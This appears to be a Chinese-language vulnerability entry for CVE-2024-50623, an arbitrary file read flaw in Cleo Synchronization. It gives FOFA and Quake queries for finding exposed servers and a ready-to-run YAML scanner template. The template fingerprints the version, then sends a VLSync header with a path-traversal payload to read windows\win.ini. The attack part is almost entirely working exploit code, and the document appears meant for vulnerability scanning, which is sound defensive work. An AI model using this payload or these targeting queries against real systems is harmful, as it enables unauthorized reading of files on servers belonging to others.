漏洞描述
Cleo Synchronization 存在任意文件读取漏洞,攻击者可通过构造恶意请求获取服务器上的任意文件内容。
fofa: server="Cleo"
Quake: server:"Cleo"
CVE-2024-50623: Cleo Synchronization 任意文件读取
PoC代码[已公开]
id: CVE-2024-50623
info:
name: Cleo Synchronization 任意文件读取
author: zan8in
severity: high
verified: false
description: |-
Cleo Synchronization 存在任意文件读取漏洞,攻击者可通过构造恶意请求获取服务器上的任意文件内容。
fofa: server="Cleo"
Quake: server:"Cleo"
reference:
- https://github.com/20142995/wxvl/blob/92b3ca2bde795952ef572cbb5549b314581d09b2/doc/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2024-50623.md
- https://mp.weixin.qq.com/s/Snhx9R-R58f9n8Rq4pgNew
tags: cve,cve2024,cleo,lfi,fileread
created: 2025/01/01
rules:
r0:
request:
method: GET
path: /Synchronization
expression: response.status == 200 && response.headers["server"].icontains("Cleo")
output:
search: '"Server: Cleo.*?/(?P<version>[0-9.]+)".bsubmatch(response.raw_header)'
version: search["version"]
r1:
request:
method: GET
path: /Synchronization
headers:
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini
expression: response.status == 200 && response.body.bcontains(b'bit app support')
expression: r0() && r1()